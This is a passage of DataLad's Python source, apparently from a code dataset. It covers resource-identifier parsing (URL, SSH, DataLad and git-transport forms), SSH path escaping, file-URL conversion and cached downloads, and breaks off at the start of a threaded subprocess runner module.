TYPES['file']\n\n # We assume that it is a URL and parse it. Depending on the result\n # we might decide that it was something else ;)\n fields = URL._pr_to_fields(urlparse(ri), guessing=True)\n lgr.log(5, \"Parsed ri %s into fields %s\", ri, fields)\n type_ = 'url'\n # Special treatments\n # file:///path should stay file:\n if fields['scheme'] and fields['scheme'] not in {'file'} \\\n and not fields['hostname']:\n # transport::URL-or-path\n if fields['path'].startswith(':'): # there was ::\n lgr.log(5, \"Assuming git transport style ri and returning\")\n type_ = 'git-transport'\n # dl+archive:... 
or just for ssh hostname:path/p1\n elif '+' not in fields['scheme']:\n type_ = 'ssh'\n lgr.log(5, \"Assuming ssh style ri, adjusted: %s\", fields)\n\n if not fields['scheme'] and not fields['hostname']:\n parts = _split_colon(ri)\n # if no illegal for username@hostname characters in the first part and\n # we either had username@hostname or multiple :-separated parts\n if not set(parts[0]).intersection(set('/\\\\#')) and (\n fields['path'] and\n '@' in fields['path'] or\n len(parts) > 1\n ):\n # user@host:path/sp1\n # or host_name: (hence parts check)\n # TODO: we need a regex to catch those really, parts check is not suff\n type_ = 'ssh'\n elif ri.startswith('//'):\n # e.g. // or ///path\n type_ = 'datalad'\n else:\n type_ = 'file'\n\n if not fields['scheme'] and fields['hostname']:\n # e.g. //a/path\n type_ = 'datalad'\n\n cls = TYPES[type_]\n # just parse the ri according to regex matchint ssh \"ri\" specs\n lgr.log(5, \"Detected %s ri\", type_)\n return cls\n\n\nclass RI(object):\n \"\"\"Resource Identifier - base class and a factory for URL, SSHRI, etc\n\n Intended to be a R/O object (i.e. no fields should be changed in-place).\n Subclasses define specific collections of fields they care about in _FIELDS\n class variable.\n The idea is that this class should help to break apart a URL, while being\n able to rebuild itself into a string representation for reuse\n\n `RI` could be used as factory, whenever type of the resource is unknown and\n must be guessed from the string representation. One of the subclasses will be\n provided as output, e.g.\n\n >>> RI('http://example.com')\n URL(hostname='example.com', netloc='example.com', scheme='http')\n >>> RI('file://C:/Windows')\n URL(hostname='c', netloc='C:', path='/Windows', scheme='file')\n >>> RI('example.com:path')\n SSHRI(hostname='example.com', path='path')\n \"\"\"\n\n # All of the subclasses will provide path\n _FIELDS = (\n 'path',\n )\n\n __slots__ = _FIELDS + ('_fields', '_str')\n\n def __new__(cls, ri=None, **kwargs):\n \"\"\"Used as a possible factory for known RI types\n\n Returns\n -------\n RI\n uninitialized RI object of appropriate class with _str\n set to string representation if was provided\n\n Raises\n ------\n ValueError\n Whenever the RI type cannot be determined.\n \"\"\"\n if cls is RI and ri is not None:\n # RI class was used as a factory\n try:\n cls = _guess_ri_cls(ri)\n except Exception as e:\n # when anything goes wrong here, ensure a homogeneous\n # exception with a regular error\n raise ValueError(\n f\"Could not determine resource identifier type for {ri!r}\"\n ) from e\n\n if cls is RI:\n raise ValueError(\n f\"Could not determine resource identifier type for {ri!r}\")\n\n ri_obj = super(RI, cls).__new__(cls)\n # Store internally original str\n ri_obj._str = str(ri) if isinstance(ri, PurePath) else ri\n return ri_obj\n\n def __init__(self, ri=None, **fields):\n \"\"\"\n Parameters\n ----------\n ri: str, optional\n String version of a resource specific for this class. If you would like\n a type of the resource be deduced, use RI(ri). Note that this value\n will be passed to str(), so you do not have to cast it yourself.\n **fields: dict, optional\n The values for the fields defined in _FIELDS class variable.\n \"\"\"\n if ri and (bool(ri) == bool(fields)):\n raise ValueError(\n \"Specify either ri or breakdown from the fields, not both. 
\"\n \"Got ri=%r, fields=%r\" % (ri, fields))\n\n self._fields = self._get_blank_fields()\n if ri is not None:\n ri = str(ri)\n fields = self._str_to_fields(ri)\n self._set_from_fields(**fields)\n\n # If was initialized from a string representation\n if lgr.isEnabledFor(logging.DEBUG) and self._str is not None:\n # well -- some ris might not unparse identically back\n # strictly speaking, but let's assume they do\n ri_ = self.as_str()\n if ri != ri_:\n lgr.debug(\"Parsed version of %s %r differs from original %r\",\n self.__class__.__name__, ri_, ri)\n\n @classmethod\n def _get_blank_fields(cls, **fields):\n return dict(((f, fields.get(f, '')) for f in cls._FIELDS))\n\n @property\n def fields(self):\n \"\"\"Returns shallow copy of fields to ease manipulations\"\"\"\n return self._fields.copy()\n\n def __repr__(self):\n # since auto_repr doesn't support \"non-0\" values atm\n return \"%s(%s)\" % (\n self.__class__.__name__,\n \", \".join([\"%s=%r\" % (k, v)\n for k, v in sorted(self._fields.items())\n if v]))\n\n # Lazily evaluated if _str was not set\n def __str__(self):\n if self._str is None:\n self._str = self.as_str()\n return self._str\n\n @classmethod\n def from_str(cls, ri_str):\n obj = cls(**cls._str_to_fields(ri_str))\n obj._str = ri_str\n return obj\n\n @property\n def localpath(self):\n # by default RIs point to remote locations\n raise ValueError(\"%s points to remote location\" % self)\n\n # Apparently doesn't quite play nicely with multiple inheritance for MixIn'\n # of regexp based URLs\n #@abstractmethod\n #@classmethod\n #def _str_to_fields(cls, ri_str):\n # raise NotImplementedError\n\n #\n # If any field is specified, URL is not considered 'False', i.e.\n # non-existing, although may be we could/shout omit having only\n # scheme or port specified since it doesn't point to any useful\n # location\n #\n\n def __bool__(self):\n fields = self._fields\n return any(fields.values())\n\n #\n # Helpers to deal with internal structures and conversions\n #\n\n def _set_from_fields(self, **fields):\n unknown_fields = set(fields).difference(self._FIELDS)\n if unknown_fields:\n raise ValueError(\"Do not know about %s. Known fields for %s are: %s\"\n % (unknown_fields, self.__class__, self._FIELDS))\n\n # encode dicts for query or fragment into\n for f in {'query', 'fragment'}:\n v = fields.get(f)\n if isinstance(v, dict):\n\n ev = urlencode(map_items(ensure_bytes, v))\n # / is reserved char within query\n if f == 'fragment' and '%2F' not in str(v):\n # but seems to be ok'ish within the fragment which is\n # the last element of URI and anyways used only by the\n # client (i.e. 
by us here if used to compose the URL)\n # so let's return / back for clarity if there were no\n # awkward %2F to startswith\n ev = ev.replace('%2F', '/')\n fields[f] = ev\n\n self._fields.update(fields)\n\n #\n # Quick comparators\n #\n\n def __eq__(self, other):\n if not isinstance(other, RI):\n other = RI(other)\n return isinstance(other, self.__class__) and dict(other._fields) == dict(self._fields)\n\n def __ne__(self, other):\n return not (self == other)\n\n def __getattribute__(self, item):\n if item.startswith('_') or item not in self._FIELDS:\n return super(RI, self).__getattribute__(item)\n else:\n return self._fields[item]\n\n def __setattr__(self, item, value):\n if item.startswith('_') or item not in self._FIELDS:\n super(RI, self).__setattr__(item, value)\n else:\n self._fields[item] = value\n self._str = None\n\n\nclass URL(RI):\n \"\"\"Universal resource locator\n\n Although largely decorating urlparse.ParseResult, it\n - doesn't mandate providing all parts of the URL\n - doesn't require netloc but rather asks for separate username, password, and hostname\n \"\"\"\n\n _FIELDS = RI._FIELDS + (\n 'scheme',\n 'netloc',\n 'username',\n 'password',\n 'hostname', 'port',\n 'query',\n 'fragment',\n )\n\n # Only interpreted on Windows. If set to `True`, UNC-names encoded in\n # file-URLs, e.g. \"file://server/share/path\", would be considered local\n # and mapped onto \"\\\\server\\share\\path\". If set to `False`, UNC-names\n # encoded in file-URLs would not be considered local and cannot be resolved\n # to a local path.\n support_unc = False\n\n def as_str(self):\n \"\"\"Render URL as a string\"\"\"\n return urlunparse(self.to_pr())\n\n @classmethod\n def _str_to_fields(cls, url_str):\n fields = URL._pr_to_fields(urlparse(url_str))\n fields['path'] = urlunquote(fields['path'])\n return fields\n\n def to_pr(self):\n \"\"\"Convert URL to urlparse.ParseResults namedtuple\"\"\"\n return self._fields_to_pr(self._fields)\n\n @classmethod\n def _fields_to_pr(cls, fields):\n \"\"\"Recompose back fields dict to ParseResult\"\"\"\n netloc = fields['username'] or ''\n if fields['password']:\n netloc += ':' + fields['password']\n if netloc:\n netloc += '@'\n netloc += fields['hostname']\n if fields['port']:\n if fields['hostname'].count(':') >= 2:\n # ipv6 -- need to enclose in []\n netloc = '[%s]:%s' % (netloc, fields['port'])\n else:\n netloc += ':%s' % fields['port']\n\n pr_fields = {\n f: fields[f]\n for f in cls._FIELDS\n if f not in ('hostname', 'password', 'username', 'port')\n }\n pr_fields['netloc'] = netloc\n pr_fields['params'] = ''\n # We need to quote the path\n pr_fields['path'] = urlquote(pr_fields['path'])\n # TODO: figure out what to do with query/fragment... 
one step at a time\n return ParseResult(**pr_fields)\n\n @classmethod\n def _pr_to_fields(cls, pr, guessing=False):\n \"\"\"ParseResult is a tuple so immutable, which complicates adjusting it\n\n This function converts ParseResult into dict\"\"\"\n if pr.params:\n (lgr.debug if guessing else lgr.warning)(\n \"ParseResults contains params %s, which will be ignored\",\n repr(pr.params),)\n\n hostname_port = pr.netloc.split('@')[-1]\n is_ipv6 = hostname_port.count(':') >= 2\n # can't use just pr._asdict since we care to ask those properties\n # such as .port , .hostname etc\n # Forcing '' instead of None since those properties (.hostname), .password,\n # .username return None if not available and we decided to uniformize\n if is_ipv6:\n rem = re.match(r'\\[(?P<hostname>.*)\\]:(?P<port>\\d+)', hostname_port)\n if rem:\n hostname, port = rem.groups()\n port = int(port)\n else:\n hostname, port = hostname_port, ''\n\n def _getattr(pr, f):\n \"\"\"Helper for custom handling in case of ipv6 addresses which blows\n stock ParseResults logic\"\"\"\n if f == 'port':\n # for now not supported at all, so\n return port\n elif f == 'hostname':\n return hostname\n else:\n return getattr(pr, f)\n else:\n _getattr = getattr\n\n return {f: (_getattr(pr, f) or '') for f in cls._FIELDS}\n\n #\n # Access helpers\n #\n\n def _parse_qs(self, s, auto_delist=True):\n \"\"\"Helper around parse_qs to strip unneeded 'list'ing etc and return a dict of key=values\"\"\"\n if not s:\n return {}\n out = map_items(ensure_unicode, dict(parse_qsl(s, 1)))\n if not auto_delist:\n return out\n for k in out:\n v = out[k]\n if isinstance(v, list) and len(v) == 1:\n v = v[0]\n out[k] = None if v == '' else v\n return out\n\n @property\n def query_dict(self):\n return self._parse_qs(self.query)\n\n @property\n def fragment_dict(self):\n return self._parse_qs(self.fragment)\n\n def _windows_local_path(self,\n support_unc: bool = False\n ) -> str:\n \"\"\"Convert the URL to a local path on windows, supports UNC and git-annex\"\"\"\n\n # RFC1738 and RFC3986 both forbid unescaped backslash characters in\n # URLs, and therefore also in the path-component of file:-URLs. We\n # assume here that any backslash present in a file-URL is a relict of a\n # verbatim copy of a Windows-style path.\n unified_path = self.path.replace('\\\\', '/')\n local_path = url2pathname(unified_path)\n\n # We support UNC notation, and the \"special\" git-annex drive encoding\n # scheme, i.e. netloc is the drive letter plus a colon.\n # NB, this if clause will not evaluate to True, because our caller\n # filters out net locations with\n if self.netloc:\n if re.match('^[a-zA-Z]:$', self.netloc):\n # This is the git-annex case, i.e. 
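# Illustrative sketch, not part of the original class definition: how the
# URL class above decomposes a URL and exposes the parsed query string.
# Expected values follow the field semantics documented in this class and
# are given as comments rather than asserted.
from datalad.support.network import URL

u = URL('http://user@example.com:8080/base/file.txt?version=2&raw=1')
# u.scheme     -> 'http'
# u.username   -> 'user'
# u.hostname   -> 'example.com'
# u.port       -> 8080
# u.path       -> '/base/file.txt'
# u.query_dict -> {'version': '2', 'raw': '1'}
# rendering the fields back into a string reproduces the input
assert str(u) == 'http://user@example.com:8080/base/file.txt?version=2&raw=1'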
drive spec in netloc\n return self.netloc + local_path\n if support_unc:\n return '\\\\\\\\' + self.netloc + local_path\n raise ValueError(\"Unsupported file: URL: {self}\")\n return local_path\n\n @property\n def localpath(self):\n if self.scheme != 'file':\n raise ValueError(\n \"Non 'file://' URL cannot be resolved to a local path\")\n\n # If there is a hostname, we might want to convert to UNC, unless the\n # hostname has the form of a 'Windows drive letter' on windows\n hostname = self.hostname\n if not (hostname in (None, '', 'localhost', '::1')\n or hostname.startswith('127.')\n or re.match('^[a-zA-Z]:$', self.netloc)):\n if on_windows:\n return self._windows_local_path(support_unc=self.support_unc)\n raise ValueError(\"file:// URL does not point to 'localhost'\")\n\n if on_windows:\n return self._windows_local_path(support_unc=True)\n\n return url2pathname(self.path)\n\n\nclass PathRI(RI):\n \"\"\"RI pointing to a (local) file/directory\"\"\"\n def as_str(self):\n return self.path\n\n @classmethod\n def _str_to_fields(cls, url_str):\n # str() to be compatible with pathlib objects\n return dict(path=str(url_str))\n\n @property\n def localpath(self):\n return str(Path(self.path))\n\n @property\n def posixpath(self):\n if is_windows_path(self.path):\n win_split = win_splitdrive(self.path)\n return \"/\" + win_split[0][0] + win_split[1].replace('\\\\', '/')\n else:\n return self.path\n\n\nclass RegexBasedURLMixin(object):\n \"\"\"Base class for URLs which we could simple parse using regular expressions\"\"\"\n\n _REGEX = None\n\n # not used ATM but possible ;)\n # @classmethod\n # def is_str_matches(cls, url_str):\n # return bool(cls._REGEX.match(url_str))\n\n @classmethod\n def _str_to_fields(cls, url_str):\n re_match = cls._REGEX.match(url_str)\n if not re_match:\n # TODO: custom error?\n raise ValueError(\n \"Cannot handle URL '%s': categorized as %r, but does not match syntax.%s\"\n % (url_str,\n cls,\n \" Did you intent to use '///'?\" if url_str.startswith('//') else '')\n )\n fields = cls._get_blank_fields()\n fields.update({k: v for k, v in re_match.groupdict().items() if v})\n cls._normalize_fields(fields)\n return fields\n\n @classmethod\n def _normalize_fields(self, fields):\n \"\"\"Helper to be ran if any of the fields need to be normalized after parsing\"\"\"\n pass\n\n\nclass SSHRI(RI, RegexBasedURLMixin):\n \"\"\"RI pointing to a remote location reachable via SSH\"\"\"\n\n _FIELDS = RI._FIELDS + (\n 'username',\n 'hostname',\n 'port',\n )\n\n _REGEX = re.compile(r'((?P<username>\\S*)@)?(?P<hostname>[^#/\\\\:]+)(\\:(?P<path>.*))?$')\n\n @classmethod\n def _normalize_fields(cls, fields):\n if fields['path'] and fields['path'].startswith('//'):\n # Let's normalize for now to avoid multiple leading slashes\n fields['path'] = '/' + fields['path'].lstrip('/')\n # escape path so we have direct representation of the path to work with\n fields['path'] = unescape_ssh_path(fields['path'])\n\n def as_str(self, escape=False):\n fields = self.fields # copy so we could escape symbols\n url_fmt = '{hostname}'\n if fields['username']:\n url_fmt = \"{username}@\" + url_fmt\n if fields['path']:\n url_fmt += ':{path}'\n if escape:\n fields['path'] = escape_ssh_path(fields['path'])\n return url_fmt.format(**fields)\n\n # TODO:\n # we can \"support\" localhost:path as localpaths\n\n\nclass DataLadRI(RI, RegexBasedURLMixin):\n \"\"\"RI pointing to datasets within default DataLad super-dataset\"\"\"\n\n _FIELDS = RI._FIELDS + (\n 'remote',\n )\n\n # For now or forever we don't deal with any 
fragments or other special stuff\n _REGEX = re.compile(r'//(?P<remote>[^\\s/]*)/(?P<path>.*)$')\n\n # do they need to be normalized??? losing track ...\n\n def as_str(self):\n return \"//{remote}/{path}\".format(**self._fields)\n\n def as_git_url(self):\n \"\"\"Dereference /// into original URLs which could be used by git for cloning\n\n Returns\n -------\n str\n URL string to reference the DataLadRI from its /// form\n \"\"\"\n if self.remote:\n raise NotImplementedError(\"not supported ATM to reference additional remotes\")\n return \"{}{}\".format(consts.DATASETS_TOPURL, urlquote(self.path))\n\n\nclass GitTransportRI(RI, RegexBasedURLMixin):\n \"\"\"RI for some other RI with git transport prefix\"\"\"\n\n # TODO: check how crticial to \"inherit\" RI._FIELDS asking to provide path\n _FIELDS = RI._FIELDS + (\n 'transport',\n 'RI',\n )\n\n # Due to poor design, `ri` argument already present in various\n # places intermixed with **kwargs treatment. So we will use RI\n # here instead of ri.\n _REGEX = re.compile(r'(?P<transport>[A-Za-z0-9][A-Za-z0-9+.-]*)::(?P<RI>.*)$')\n\n def as_str(self):\n return '{self.transport}::{self.RI}'.format(self=self)\n\n\ndef _split_colon(s, maxsplit=1):\n \"\"\"Split on unescaped colon\"\"\"\n return re.compile(r'(?<!\\\\):').split(s, maxsplit=maxsplit)\n\n# \\ should be first to deal with\n_SSH_ESCAPED_CHARACTERS = '\\\\#&;`|*?~<>^()[]{}$\\'\" '\n\n\n# TODO: RF using re.sub\ndef escape_ssh_path(path):\n \"\"\"Escape all special characters present in the path\"\"\"\n for c in _SSH_ESCAPED_CHARACTERS:\n if c in path:\n path = path.replace(c, '\\\\' + c)\n return path\n\n\ndef unescape_ssh_path(path):\n \"\"\"Un-escape all special characters present in the path\"\"\"\n for c in _SSH_ESCAPED_CHARACTERS[::-1]:\n if c in path:\n path = path.replace('\\\\' + c, c)\n return path\n\n\ndef parse_url_opts(url):\n \"\"\"Given a string with url-style query, split into content before # and options as dict\"\"\"\n url = URL(url)\n # we need to filter out query and fragment to get the base url\n fields = url.fields\n fields.pop('query')\n fields.pop('fragment')\n opts = url.query_dict\n return str(URL(**fields)), opts\n\n\n# TODO: should we just define URL.good_for_git or smth like that? ;)\n# although git also understands regular paths\ndef is_url(ri):\n \"\"\"Returns whether argument is a resource identifier what datalad should treat as a URL\n\n This includes ssh \"urls\" which git understands.\n\n Parameters\n ----------\n ri : str or RI\n The resource identifier (as a string or RI) to \"analyze\"\n \"\"\"\n if not isinstance(ri, RI):\n try:\n ri = RI(ri)\n except: # MIH: MemoryError?\n return False\n return isinstance(ri, (URL, SSHRI))\n\n\n# TODO: RF to remove duplication\ndef is_datalad_compat_ri(ri):\n \"\"\"Returns whether argument is a resource identifier what datalad should treat as a URL\n\n including its own DataLadRI\n \"\"\"\n if not isinstance(ri, RI):\n try:\n ri = RI(ri)\n except: # MIH: MemoryError?\n return False\n return isinstance(ri, (URL, SSHRI, DataLadRI))\n\n\n# TODO: better name? 
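# Illustrative sketch, not part of the original module: classify a few
# resource identifiers with the helpers defined above, and round-trip a
# path through the SSH escaping functions.
from datalad.support.network import (
    escape_ssh_path,
    is_datalad_compat_ri,
    is_url,
    unescape_ssh_path,
)

assert is_url('https://example.com/data')   # regular URL
assert is_url('host:path/to/ds')            # ssh-style "url" git understands
assert not is_url('/some/local/path')       # plain paths are not URLs
assert is_datalad_compat_ri('///dataset')   # the /// DataLadRI form qualifies

p = 'dir with spaces/$weird name'
assert unescape_ssh_path(escape_ssh_path(p)) == p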
additionally may be move to SSHRI.is_valid() or sth.\ndef is_ssh(ri):\n \"\"\"helper to determine, whether `ri` requires an SSH connection\n\n Parameters\n ----------\n ri: str or RI\n\n Returns\n -------\n bool\n \"\"\"\n\n # not exactly fitting the doc, but we actually can deal not necessarily with\n # string or RI only, but with everything RI itself can deal with:\n _ri = RI(ri) if not isinstance(ri, RI) else ri\n\n return isinstance(_ri, SSHRI) \\\n or (isinstance(_ri, URL) and _ri.scheme == 'ssh')\n\n\ndef get_local_file_url(fname: str,\n compatibility: str = 'git-annex',\n allow_relative_path: bool = True\n ) -> str:\n \"\"\"Return OS specific URL pointing to a local file\n\n Parameters\n ----------\n fname : string\n Filename. If not absolute, abspath is used\n compatibility : str, optional\n This parameter is only interpreted on Windows systems. If set to\n anything else than 'git', the anchor, e.g. `C:` of `fname` will be put\n into the `file-auth` part, i.e. network location, defined in RFC 8089.\n This option is mainly used to support git-annex specific encoding of\n Windows paths.\n allow_relative_path: bool, optional\n Allow `fname` to be a relative path. The path will be converted to an\n absolute path, by using the current directory as path prefix.\n \"\"\"\n url_path = local_path2url_path(fname, allow_relative_path=allow_relative_path)\n if on_windows and compatibility != \"git\":\n # Work around the way in which git-annex interprets file URLs on\n # Windows. This code path will put the path anchor, e.g. `C:` of `fname`\n # into the network location component of the resulting URL.\n return \"file:/\" + url_path\n\n result = \"file://\" + url_path\n return result\n\n\ndef get_url_cache_filename(url, name=None):\n \"\"\"Return a filename where to cache online doc from a url\"\"\"\n if not name:\n name = \"misc\"\n cache_dir = opj(cfg.obtain('datalad.locations.cache'), name)\n doc_fname = opj(\n cache_dir,\n '{}-{}.p{}'.format(\n urlsplit(url).netloc,\n md5(url.encode('utf-8')).hexdigest(),\n pickle.HIGHEST_PROTOCOL)\n )\n return doc_fname\n\n\ndef get_cached_url_content(url, name=None, fetcher=None, maxage=None):\n \"\"\"Loader of a document from a url, which caches loaded instance on disk\n\n Doesn't do anything smart about http headers etc which could provide\n information for cache/proxy servers for how long to retain etc\n\n TODO: theoretically it is not network specific at all -- and just a memoize\n pattern, but may be some time we would make it treat headers etc correctly.\n And ATM would support any URL we support via providers/downloaders\n\n Parameters\n ----------\n fetcher: callable, optional\n Function to call with url if needed to be refetched\n maxage: float, optional\n Age in days to retain valid for. <0 - would retain forever. If None -\n would consult the config, 0 - would force to reload\n \"\"\"\n doc_fname = get_url_cache_filename(url, name)\n if maxage is None:\n maxage = float(cfg.get('datalad.locations.cache-maxage'))\n\n doc = None\n if os.path.exists(doc_fname) and maxage != 0:\n\n fage = (time.time() - os.stat(doc_fname).st_mtime)/(24. 
* 3600)\n if maxage < 0 or fage < maxage:\n try:\n lgr.debug(\"use cached request result to '%s' from %s\", url, doc_fname)\n doc = pickle.load(open(doc_fname, 'rb'))\n except Exception as e: # it is OK to ignore any error and fall back on the true source\n lgr.warning(\n \"cannot load cache from '%s', fall back to download: %s\",\n doc_fname, CapturedException(e))\n\n if doc is None:\n if fetcher is None:\n from datalad.downloaders.providers import Providers\n providers = Providers.from_config_files()\n fetcher = providers.fetch\n\n doc = fetcher(url)\n ensure_dir(dirname(doc_fname))\n # use pickle to store the entire request result dict\n pickle.dump(doc, open(doc_fname, 'wb'))\n lgr.debug(\"stored result of request to '%s' in %s\", url, doc_fname)\n return doc\n\n\ndef download_url(url, dest=None, overwrite=False):\n \"\"\"Download a file from a URL\n\n Supports and honors any DataLad \"downloader/provider\" configuration.\n\n Parameters\n ----------\n url: str\n Source URL to download from.\n dest: Path-like or None\n Destination file name (file must not exist), or name of a target\n directory (must exists, and filename must be derivable from `url`).\n If None, the downloaded content will be returned as a string.\n overwrite: bool\n Force overwriting an existing destination file.\n\n Returns\n -------\n str\n Path of the downloaded file, or URL content if `dest` is None.\n\n Raises\n ------\n DownloadError\n If `dest` already exists and is a file, or if `dest` is a directory\n and no filename could be determined from `url`, or if no file was\n found at the given `url`.\n \"\"\"\n from datalad.downloaders.providers import Providers\n providers = Providers.from_config_files()\n if dest:\n return providers.download(url, path=str(dest), overwrite=overwrite)\n else:\n return providers.fetch(url)\n\n\ndef local_path2url_path(local_path: str,\n allow_relative_path: bool = False\n ) -> str:\n \"\"\"Convert a local path into an URL path component\"\"\"\n local_path = Path(local_path)\n if not local_path.is_absolute() and allow_relative_path:\n local_path = local_path.absolute()\n\n url = urlparse(Path(local_path).as_uri())\n if url.netloc:\n raise ValueError(\n f\"cannot convert remote path to an URL path: {local_path}\")\n return url.path\n\n\ndef url_path2local_path(url_path: str | PurePosixPath) -> str | Path:\n if isinstance(url_path, PurePosixPath):\n return_path = True\n url_path = str(url_path)\n else:\n return_path = False\n\n if not url_path or not url_path.startswith(\"/\"):\n # We expect a 'path-absolute' as defined in RFC 3986, therefore the\n # path must begin with a slash.\n raise ValueError(\n f\"url path does not start with '/': {url_path}, and is therefore \"\n f\"not an absolute-path as defined in RFC 8089\")\n\n if url_path.startswith(\"//\"):\n # We expect a 'path-absolute' as defined in RFC 3986, therefore the\n # first segment must not be empty, i.e. the path must not start with\n # two or more slashes.\n raise ValueError(\n f\"url path has empty first segment: {url_path}, and is therefore \"\n f\"not an absolute-path as defined in RFC 8089\")\n\n return (\n Path(url2pathname(url_path))\n if return_path\n else url2pathname(url_path)\n )\n\n\ndef quote_path(path: str, safe: str = \"/\") -> str:\n \"\"\"quote the path component of a URL, takes OS specifics into account\n\n On Windows-like system a path-prefix consisting of a slash, a single letter,\n a colon, and a slash, i.e. 
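# Illustrative sketch, not part of the original module, assuming a POSIX
# platform: convert a local path into an URL path component and back with
# the helpers defined above.
from datalad.support.network import (
    local_path2url_path,
    url_path2local_path,
)

url_path = local_path2url_path('/tmp/some file')
# -> '/tmp/some%20file' (the space is percent-encoded)
assert url_path2local_path(url_path) == '/tmp/some file'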
'/c:/Windows', the colon will not be quoted.\n All characters after the colon will be quoted by `urllib.parse.quote`.\n\n On Unix-like systems the complete path component will be quoted by\n 'urllib.parse.quote'.\n\n Parameters\n ----------\n path: str\n The path that should be quoted\n\n safe: str (default '/')\n Characters that should not be quoted, passed\n on to the save-parameter of `urllib.parse.quote`.\n\n Returns\n -------\n str\n The quoted path component\n \"\"\"\n if on_windows:\n if re.match(\"^/[a-zA-Z]:/\", path):\n return path[:3] + quote(path[3:], safe=safe)\n return quote(path, safe=safe)\n\n\nlgr.log(5, \"Done importing support.network\")\n" }, { "alpha_fraction": 0.5889691114425659, "alphanum_fraction": 0.5904660820960999, "avg_line_length": 38.040260314941406, "blob_id": "e9941f27dd938964263559289c1d6a7b453f0b2a", "content_id": "8340ab1df9c27eb0d920a61560ff8251009b6bb1", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 30061, "license_type": "permissive", "max_line_length": 88, "num_lines": 770, "path": "/datalad/runner/nonasyncrunner.py", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "# emacs: -*- mode: python; py-indent-offset: 4; tab-width: 4; indent-tabs-mode: nil -*-\n# ex: set sts=4 ts=4 sw=4 et:\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n#\n# See COPYING file distributed along with the datalad package for the\n# copyright and license terms.\n#\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n\"\"\"\nThread based subprocess execution with stdout and stderr passed to protocol objects\n\"\"\"\n\nfrom __future__ import annotations\n\nimport enum\nimport logging\nimport subprocess\nimport threading\nimport time\nfrom collections import deque\nfrom collections.abc import Generator\nfrom queue import (\n Empty,\n Queue,\n)\nfrom subprocess import Popen\nfrom typing import (\n IO,\n Any,\n Optional,\n)\n\nfrom datalad.utils import on_windows\n\nfrom .exception import CommandError\nfrom .protocol import (\n GeneratorMixIn,\n WitlessProtocol,\n)\nfrom .runnerthreads import (\n IOState,\n ReadThread,\n WaitThread,\n WriteThread,\n _try_close,\n)\n\nlgr = logging.getLogger(\"datalad.runner.nonasyncrunner\")\n\nSTDIN_FILENO = 0\nSTDOUT_FILENO = 1\nSTDERR_FILENO = 2\n\n\n# A helper to type-safe retrieval of a Popen-fileno, if data exchange was\n# requested.\ndef _get_fileno(active: bool,\n popen_std_x: Optional[IO]\n ) -> Optional[int]:\n if active:\n assert popen_std_x is not None\n return popen_std_x.fileno()\n return None\n\n\nclass _ResultGenerator(Generator):\n \"\"\"\n Generator returned by run_command if the protocol class\n is a subclass of `datalad.runner.protocol.GeneratorMixIn`\n \"\"\"\n class GeneratorState(enum.Enum):\n initialized = 0\n process_running = 1\n process_exited = 2\n connection_lost = 3\n waiting_for_process = 4\n exhausted = 5\n\n def __init__(self,\n runner: ThreadedRunner,\n result_queue: deque\n ) -> None:\n\n super().__init__()\n self.runner = runner\n self.result_queue = result_queue\n self.return_code = None\n self.state = self.GeneratorState.process_running\n self.all_closed = False\n self.send_lock = threading.Lock()\n\n def _check_result(self):\n self.runner._check_result()\n\n def send(self, message):\n with self.send_lock:\n return self._locked_send(message)\n\n def _locked_send(self, message):\n if self.state == self.GeneratorState.initialized:\n if message is not 
None:\n raise RuntimeError(\n f\"sent non-None message {message!r} to initialized generator \"\n )\n self.state = self.GeneratorState.process_running\n\n runner = self.runner\n\n if self.state == self.GeneratorState.process_running:\n # If we have elements in the result queue, return one\n while len(self.result_queue) == 0 and runner.should_continue():\n runner.process_queue()\n if len(self.result_queue) > 0:\n return self.result_queue.popleft()\n\n # The process must have exited\n # Let the protocol prepare the result. This has to be done after\n # the loop was left to ensure that all data from stdout and stderr\n # is processed.\n runner.protocol.process_exited()\n self.return_code = runner.process.poll()\n self._check_result()\n self.state = self.GeneratorState.process_exited\n\n if self.state == self.GeneratorState.process_exited:\n # The protocol might have added result in the\n # _prepare_result()- or in the process_exited()-\n # callback. Those are returned here.\n if len(self.result_queue) > 0:\n return self.result_queue.popleft()\n runner.ensure_stdin_stdout_stderr_closed()\n runner.protocol.connection_lost(None) # TODO: check for exceptions\n runner.wait_for_threads()\n runner._set_process_exited()\n self.state = self.GeneratorState.connection_lost\n\n if self.state == self.GeneratorState.connection_lost:\n # Get all results that were enqueued in\n # state: GeneratorState.process_exited.\n if len(self.result_queue) > 0:\n return self.result_queue.popleft()\n self.state = self.GeneratorState.exhausted\n runner.owning_thread = None\n with runner.generator_condition:\n runner.generator = None\n runner.generator_condition.notify()\n\n if self.state == self.GeneratorState.exhausted:\n raise StopIteration(self.return_code)\n\n raise RuntimeError(f\"unknown state: {self.state}\")\n\n def throw(self, exception_type, value=None, trace_back=None):\n return Generator.throw(self, exception_type, value, trace_back)\n\n\nclass ThreadedRunner:\n \"\"\"\n A class the contains a naive implementation for concurrent sub-process\n execution. It uses `subprocess.Popen` and threads to read from stdout and\n stderr of the subprocess, and to write to stdin of the subprocess.\n\n All read data and timeouts are passed to a protocol instance, which can\n create the final result.\n \"\"\"\n # Interval in seconds after which we check that a subprocess\n # is still running.\n timeout_resolution = 0.2\n\n def __init__(self,\n cmd: str | list,\n protocol_class: type[WitlessProtocol],\n stdin: int | IO | bytes | Queue[Optional[bytes]] | None,\n protocol_kwargs: Optional[dict] = None,\n timeout: Optional[float] = None,\n exception_on_error: bool = True,\n **popen_kwargs\n ):\n \"\"\"\n Parameters\n ----------\n cmd : list or str\n Command to be executed, passed to `subprocess.Popen`. If cmd\n is a str, `subprocess.Popen will be called with `shell=True`.\n\n protocol : WitlessProtocol class or subclass which will be\n instantiated for managing communication with the subprocess.\n\n If the protocol is a subclass of\n `datalad.runner.protocol.GeneratorMixIn`, this function will\n return a `Generator` which yields whatever the protocol callback\n fed into `GeneratorMixIn.send_result()`.\n\n If the protocol is not a subclass of\n `datalad.runner.protocol.GeneratorMixIn`, the function will return\n the result created by the protocol method `_generate_result`.\n\n stdin : file-like, bytes, Queue, or None\n If stdin is a file-like, it will be directly used as stdin for the\n subprocess. 
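# Illustrative sketch of the stdin variants documented for this runner.
# Assumptions not shown in this file: an output-capturing protocol
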